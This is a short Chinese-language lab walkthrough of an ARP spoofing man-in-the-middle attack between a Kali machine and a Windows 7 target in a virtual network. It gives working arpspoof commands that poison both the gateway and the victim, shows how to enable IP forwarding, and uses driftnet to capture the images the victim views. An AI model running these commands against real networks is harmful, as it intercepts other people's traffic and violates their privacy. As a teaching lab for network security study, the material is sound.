虚拟环境
目标机:win7 x64 —— 192.168.52.5
网关:192.168.52.2
攻击机:kali —— 192.168.52.6
两台主机网络适配器都设置为NAT模式,保证IP处于同一网段。
注意:出现瓶颈错误时多自检自查,检查是否联网,防火墙是否关闭,IP是否输入正确,目标机和攻击机是否可以相互通信,ping命令用起来。
步骤
1、查看网关的mac地址
arp -a
2、在攻击机上安装该工具进行arp欺骗
arpspoof
3、执行命令,不断欺骗网关使之认为攻击机的mac地址即为目标机mac地址。
arpspoof -t 192.168.52.2 -i eth0 192.168.52.5 #欺骗网关
4、执行命令,不断欺骗目标机使之认为攻击机的mac地址即为网关mac地址。
arpspoof -t 192.168.52.5 -i eth0 192.168.52.2 #欺骗主机
5、再次arp -a查看,发现网关的mac地址已经和攻击机的mac地址相同。
arp -a
6、此时win7访问www.baidu.com,发送的数据包将会首先发往攻击机,由于攻击机未开启转发功能,因win7还不能上网。
7、在kali开启转发,发现此时目标机win7可以上网了。
echo 1 > /proc/sys/net/ipv4/ip_forward
8、此时目标机发出的数据都可以被攻击机使用各种工具截获,如,driftnet工具可以截获目标机访问的图片,命令为driftnet -i eth0。
driftnet -i eth0
如下图为在目标机win7上访问查看的图片
下图为攻击机上用driftnet工具截获的图片
9、关闭转发,关闭后,目标机就又回到无法联网的状态了,ctrl+Z结束arp欺骗。
echo 0 > /proc/sys/net/ipv4/ip_forward